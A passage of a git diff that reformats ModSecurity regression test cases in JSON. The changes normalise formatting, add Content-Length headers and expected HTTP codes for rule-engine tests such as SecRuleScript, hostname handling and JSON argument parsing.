1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "Failed to load script: Failed to compile script " + }, + "rules": [ "SecRuleEngine On", "SecRuleScript /bin/echo \"id:1,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (3/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" + }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"echo 123", - "error_log":"", - "parser_error":"", + "body": [ + "" + ] + }, + "expected": { + "debug_log": "echo 123", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match-log.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: SecRuleScript (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecRuleScript (4/4)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } - }, - "expected":{ - "audit_log":"", - "debug_log":"Running \\(disruptive\\) action: deny", - "error_log":"", - "parser_error":"", + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Running \\(disruptive\\) action: deny", "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleScript test-cases/data/match.lua \"id:1,t:lowercase,t:none,status:404,deny\"" ] } ] - diff --git a/test/test-cases/regression/fn-setHostname.json b/test/test-cases/regression/fn-setHostname.json index 59c5b52e8f..8f8d6b2d5f 100644 --- a/test/test-cases/regression/fn-setHostname.json +++ b/test/test-cases/regression/fn-setHostname.json @@ -1,38 +1,44 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing function :: setRequestHostName", + "enabled": 1, + "version_min": 300000, + "title": "Testing function :: setRequestHostName", "client": { - "ip":"200.249.12.31" + "ip": "200.249.12.31", + "port": 0 }, - "server":{ - "ip":"200.249.12.31", - "port":80, - "hostname":"modsecurity.org" + "server": { + "ip": "200.249.12.31", + "port": 80 }, "request": { "headers": { - "Host":"www.modsecurity.org" + "Host": "www.modsecurity.org", + "Content-Length": "0" }, - "uri":"/foo?q=attack", - "http_version": 1.1 + "uri": "/foo?q=attack", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/plain" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/plain", + "Content-Length": "10" }, - "body":[ + "body": [ "denystring" ] }, - "expected":{ - "http_code": 403, - "debug_log": "[hostname: \"modsecurity.org\"]" + "expected": { + "debug_log": "[hostname: \"modsecurity.org\"]", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", "SecRule ARGS_GET \"@contains attack\" \"id:1,phase:2,deny\"" diff --git a/test/test-cases/regression/issue-1152.json b/test/test-cases/regression/issue-1152.json index 54c78f7991..227f08dc05 100644 --- a/test/test-cases/regression/issue-1152.json +++ b/test/test-cases/regression/issue-1152.json @@ -4,7 +4,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -16,8 +16,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,18 +25,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 @@ -52,7 +58,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,8 +70,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -73,19 +79,23 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, "body": [ + "" ] }, "expected": { @@ -102,7 +112,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -114,8 +124,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -123,19 +133,23 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, "body": [ + "" ] }, "expected": { @@ -152,7 +166,7 @@ "version_min": 209000, "version_max": -1, "title": "Should libmodsec pass action clear m_actions?", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1152", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1152", "client": { "ip": "200.249.12.31", "port": 2313 @@ -164,8 +178,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -173,24 +187,28 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?a=test&b=test&c=test&d=test", + "uri": "/test.pl?a=test&b=test&c=test&d=test", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" }, "body": [ + "" ] }, "expected": { - "http_code": 200, - "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)" + "debug_log": "Target value: \"4\" \\(Variable: TX:test\\)", + "http_code": 200 }, "rules": [ "SecRuleEngine On", diff --git a/test/test-cases/regression/issue-1528.json b/test/test-cases/regression/issue-1528.json index f2257055c2..53c8daa22b 100644 --- a/test/test-cases/regression/issue-1528.json +++ b/test/test-cases/regression/issue-1528.json @@ -1,38 +1,46 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Macro expansion inside regex does not work", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1528", - "gihub_issue": 1528, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "uri":"/?param=attack", - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1", - "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'" - }, - "rules": [ - "SecRuleEngine On", - "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", - "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Macro expansion inside regex does not work", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1528", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "/?param=attack", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "error_log": "Matched \"Operator `Rx' with parameter `\\^attack\\$'", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1, nolog, setvar:tx.bad_value=attack\"", + "SecRule ARGS:param \"@rx ^%{tx.bad_value}$\" \"id:2,block\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1565.json b/test/test-cases/regression/issue-1565.json index 6596404f17..df729affb6 100644 --- a/test/test-cases/regression/issue-1565.json +++ b/test/test-cases/regression/issue-1565.json @@ -1,79 +1,92 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1565", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"!^\\d+$\" \"id:1,log\"" + ] }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" - ] -} - + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Problem with OWASP CRS rule 920160 when msc_process_request_headers called (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1565", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 1", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_HEADERS:Content-Length \"^\\d+$\" \"id:1,log\"" + ] + } ] diff --git a/test/test-cases/regression/issue-1576.json b/test/test-cases/regression/issue-1576.json index eb41e1dfb6..17239727e4 100644 --- a/test/test-cases/regression/issue-1576.json +++ b/test/test-cases/regression/issue-1576.json @@ -4,21 +4,26 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (1)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "application/json" + "Content-Type": "application/json", + "Content-Length": "158" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -33,18 +38,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0" + "expected": { + "debug_log": "zwei\" \\(Variable: ARGS:json.ops.array_3.eins.array_0", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { @@ -52,21 +62,26 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "application/json" + "Content-Type": "application/json", + "Content-Length": "30" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "[", " \"one\",", @@ -75,18 +90,23 @@ "]" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)" + "expected": { + "debug_log": "three\" \\(Variable: ARGS:json.array_2\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] }, { @@ -94,21 +114,26 @@ "version_min": 209000, "version_max": -1, "title": "JSON array should be handled even without a key (3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1576", - "client":{ - "ip":"200.249.12.31", - "port":123 + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1576", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Content-Type": "application/json" + "Content-Type": "application/json", + "Content-Length": "215" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "{", " \"foo\":\"bar\",", @@ -126,18 +151,23 @@ "}" ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "expected":{ - "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)" + "expected": { + "debug_log": "treze\" \\(Variable: ARGS:json.ops.seis.doze\\)", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", - "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecRule REQUEST_HEADERS:Content-Type \"application/json\" \"id:'200001',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=JSON\"", + "SecRule ARGS \"asdf\" \"id:'200441',phase:3,log\"" ] } ] diff --git a/test/test-cases/regression/issue-1591.json b/test/test-cases/regression/issue-1591.json index 2b32aa29a2..4ecdaac3f3 100644 --- a/test/test-cases/regression/issue-1591.json +++ b/test/test-cases/regression/issue-1591.json @@ -1,119 +1,140 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 0." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "debug_log": "Rule returned 1." - }, - "rules": [ - "SecRuleEngine On", - "SecRule REQUEST_COOKIES \"321\" \"id:1,log\"" - ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Regular expressions in rule targets not respected (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/1591", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length": "1539", - "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Rule returned 0.", + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/ \"321\" \"id:1,log\"" + ] }, - "expected": { - "debug_log": "Variable: REQUEST_HEADERS:Content-Length" + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Regular expressions in rule targets not respected (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/1591", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "0", + "Cookie": "__utma=1.32168570.12572608.1259628772.2&__utmb=1.4.10.1259628772&" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + 